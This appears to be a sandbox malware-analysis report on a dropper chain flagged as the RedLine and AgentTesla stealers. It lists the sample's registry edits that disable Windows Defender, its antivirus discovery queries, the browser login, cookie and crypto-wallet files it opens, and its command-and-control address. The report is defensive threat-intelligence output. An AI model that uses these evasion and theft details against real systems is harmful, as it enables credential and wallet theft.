                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_02460490 LdrInitializeThunk | 10_2_02460490
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00176F40 SetUnhandledExceptionFilter | 0_2_00176F40
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00176CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00176CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00396F40 SetUnhandledExceptionFilter | 1_2_00396F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00396CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 1_2_00396CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00136F40 SetUnhandledExceptionFilter | 2_2_00136F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00136CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_00136CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD6F40 SetUnhandledExceptionFilter | 3_2_00FD6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_00FD6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 10_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 10_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 10_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004123F1 SetUnhandledExceptionFilter | 10_2_004123F1
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle | 0_2_001718A3
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: GetLocaleInfoA | 10_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical events)
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00177155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 0_2_00177155
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Code function: 4_2_00007FFBACE6077D GetUserNameA | 4_2_00007FFBACE6077D
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle | 0_2_00172BFB

                    Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: caQi43qE17.exe, 0000000A.00000002.369592514.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.369592514.000000000598D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.caQi43qE17.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: caQi43qE17.exe PID: 4632, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPED
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
Source: caQi43qE17.exe, 0000000A.00000002.369592514.000000000598D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*x
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
Source: caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: Yara match | File source: Process Memory Space: caQi43qE17.exe PID: 4632, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File sources: the same PCAP, unpacked PE, memory dump, process memory and dropped-file sources (C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe) as listed under Stealing of Sensitive Information above
MITRE ATT&CK Matrix (numbers in front of a technique are the signature-count badges of the original matrix)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 221 Windows Management Instrumentation | 1 Windows Service | 2 Bypass User Access Control | 21 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 1 Windows Service | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 1 Service Execution | Logon Script (Mac) | 1 Process Injection | 21 Software Packing | NTDS | 137 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 361 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Bypass User Access Control | Cached Domain Credentials | 231 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 231 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Process Injection | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 1 Rundll32 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
Behavior Graph (ID: 816370, Sample: file.exe, Startdate: 27/02/2023, Architecture: WINDOWS, Score: 100)
Top-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 8 other signatures
Process chain shown in the graph:
file.exe started; drops C:\Users\user\AppData\...\pluT14Nj54.exe (PE32) and C:\Users\user\AppData\...\grWB27Fb84.exe (PE32); also started: rundll32.exe, rundll32.exe and 2 other processes
pluT14Nj54.exe started; drops C:\Users\user\AppData\...\plct23La85.exe (PE32) and C:\Users\user\AppData\...\fuYn3946BI92.exe (PE32); signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
plct23La85.exe started; drops C:\Users\user\AppData\...\plvy67MJ29.exe (PE32) and C:\Users\user\AppData\...\diIN97YY43.exe (PE32); signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
plvy67MJ29.exe started; drops C:\Users\user\AppData\...\caQi43qE17.exe (PE32) and C:\Users\user\AppData\...\buze36rj14.exe (PE32); signatures: Machine Learning detection for dropped file
caQi43qE17.exe started; network: 193.233.20.24, 4123, 49699 REDCOM-AS Redcom Khabarovsk Russia RU Russian Federation; signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 3 other signatures
buze36rj14.exe started; signatures: Machine Learning detection for dropped file; Disable Windows Defender notifications (registry); Disable Windows Defender real time protection (registry)

Source | Detection | Scanner | Label
file.exe | 64% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine
file.exe | 54% | Virustotal |
file.exe | 100% | Avira | HEUR/AGEN.1252166
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | 100% | Avira | HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | 69% | Virustotal |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | 54% | ReversingLabs | Win32.Trojan.Tedy
C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | 47% | Virustotal |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe | 26% | ReversingLabs | Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe | 26% | Virustotal |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | 54% | ReversingLabs | Win32.Trojan.Tedy
C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe | 26% | ReversingLabs | Win32.Trojan.CrypterX

Source | Detection | Scanner | Label
3.3.plvy67MJ29.exe.4fa6d7e.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.3.plct23La85.exe.4e6a220.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.file.exe.170000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
0.0.file.exe.170000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
1.3.pluT14Nj54.exe.47fe420.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    No Antivirus matches
Source | Detection | Scanner | Label
193.233.20.24:4123 | 0% | Avira URL Cloud | safe

No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
193.233.20.24:4123 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id4caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id7caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id6caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id19ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id15ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://tempuri.org/Entity/Id14VcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002A0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegistercaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Entity/Id6ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.ip.sb/ipfile.exe, 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, grWB27Fb84.exe.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/sccaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id9ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id20caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id21caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id22caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
